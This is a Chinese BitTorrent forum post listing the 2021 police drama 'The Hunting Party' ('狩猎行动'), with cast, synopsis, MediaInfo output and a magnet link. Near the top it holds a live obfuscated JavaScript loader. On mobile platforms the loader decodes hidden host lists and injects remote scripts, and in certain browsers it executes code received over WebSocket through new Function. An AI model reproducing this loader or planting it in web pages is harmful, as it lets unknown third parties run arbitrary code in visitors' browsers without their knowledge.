狩猎行动[国语配音/中文字幕].The.hunting.party.2021.1080p.WEB-DL.H264.AAC 1.09GB

版主小s 28天前 206

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 狩猎行动
◎年  代 2021
◎产  地 中国大陆
◎类  别 剧情 / 动作 / 犯罪
◎语  言 汉语普通话
◎上映日期 2021-09-22(中国大陆网络)
◎IMDb链接 https://www.imdb.com/title//
◎豆瓣链接 https://movie.douban.com/subject/35316564/
◎片  长 78分钟
◎导  演 黑子 Zi Hei (id:1274723)
◎编  剧 杨佳富 Jiafu Yang (id:1324419)
◎演  员 李飞 Fei Li (id:1335598)
       黑子 Zi Hei (id:1274723)
       王文轩 Wenxuan Wang (id:1387006)
       葛布 Gabriella (id:1341375)
       黄垲翔 Kaixiang Huang (id:1389032)
       杨俊超 Junchao Yang (id:1421929)
       杨子骅 Zihua Yang (id:1322769)
       何达 Da He (id:1326695)
       晋松 Song Jin (id:1315699)
       洪卫 Wei Hong (id:1335603)
       郎峰 Feng Lang (id:1313859)
       郝率 Shuai Hao (id:1326046)
       张璐瑶 Luyao Zhang (id:1380109)
       冯阳阳 Yangyang Feng (id:1455372)

◎标  签 2021等评分 / 大陆 / 缉毒 / 犯罪 / 热血 / 温情 / 慢动作太多 / 大陆国影

◎简  介
  李正彬(黑子饰)、王晖(李飞饰)、于振海(郝率饰)三人曾是特种部队出身的战友,感情如同手足,退伍后三人被特警支队特招成为特警,在一次借调工作中,于振海卧底到毒枭扎卡(晋松饰)组织内部,不料在一次交易中被扎卡手下发现并杀害,在警方精心部署调查中挖掘出另一只更强大的,以谭筱山(杨子骅饰)为首的贩毒组织团伙,原来谭筱山和扎卡两拨势力一直想独占市场,吞掉对方,为抓捕两大贩毒头目,王晖主动申请潜入毒贩内部,化名陈昌平(李飞饰)屡次舍命救下谭筱山独子谭子龙,并取得其信任,另一方面,李正彬在成为缉毒支队支队长后,得力干将赵永军(何达饰)及其下属张雷(杨俊超饰)感化了部分毒贩成为警方线人,收集犯罪组织证据。但赵永军和张雷并不知道陈昌平的存在,险些对其造成伤害。单亲妈妈小妹(葛布饰)为给死去的丈夫报仇,感激陈昌平救命其母子之恩,主动申请成为陈昌平和李正彬的线人,陈昌平...

  1. ##### MediaInfo ######
  2. General
  3. Complete name                            : 狩猎行动.The hunting [email protected]
  4. Format                                   : MPEG-4
  5. Format profile                           : Base Media
  6. Codec ID                                 : isom (isom/iso2/avc1/mp41)
  7. File size                                : 1.09 GiB
  8. Duration                                 : 1 h 19 min
  9. Overall bit rate mode                    : Variable
  10. Overall bit rate                         : 1 949 kb/s
  11. Writing application                      : Lavf58.76.100
  12. Video
  13. ID                                       : 1
  14. Format                                   : AVC
  15. Format/Info                              : Advanced Video Codec
  16. Format profile                           : [email protected]
  17. Format settings                          : CABAC / 3 Ref Frames
  18. Format settings, CABAC                   : Yes
  19. Format settings, Reference frames        : 3 frames
  20. Codec ID                                 : avc1
  21. Codec ID/Info                            : Advanced Video Coding
  22. Duration                                 : 1 h 19 min
  23. Bit rate                                 : 1 752 kb/s
  24. Width                                    : 1 920 pixels
  25. Height                                   : 816 pixels
  26. Display aspect ratio                     : 2.35:1
  27. Frame rate mode                          : Constant
  28. Frame rate                               : 25.000 FPS
  29. Color space                              : YUV
  30. Chroma subsampling                       : 4:2:0
  31. Bit depth                                : 8 bits
  32. Scan type                                : Progressive
  33. Bits/(Pixel*Frame)                       : 0.045
  34. Stream size                              : 1 002 MiB (90%)
  35. Color range                              : Limited
  36. Color primaries                          : BT.709
  37. Transfer characteristics                 : BT.709
  38. Matrix coefficients                      : BT.709
  39. Codec configuration box                  : avcC
  40. Audio
  41. ID                                       : 2
  42. Format                                   : AAC LC
  43. Format/Info                              : Advanced Audio Codec Low Complexity
  44. Codec ID                                 : mp4a-40-2
  45. Duration                                 : 1 h 19 min
  46. Bit rate mode                            : Variable
  47. Bit rate                                 : 192 kb/s
  48. Channel(s)                               : 2 channels
  49. Channel layout                           : L R
  50. Sampling rate                            : 44.1 kHz
  51. Frame rate                               : 43.066 FPS (1024 SPF)
  52. Compression mode                         : Lossy
  53. Stream size                              : 108 MiB (10%)
  54. Default                                  : Yes
  55. Alternate group                          : 1


TAGS 动作 剧情 犯罪

磁力链:
  • magnet:?xt=urn:btih:3FD577BC8D493F8BAD1BF2F394DB8B352A5BA3DF
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回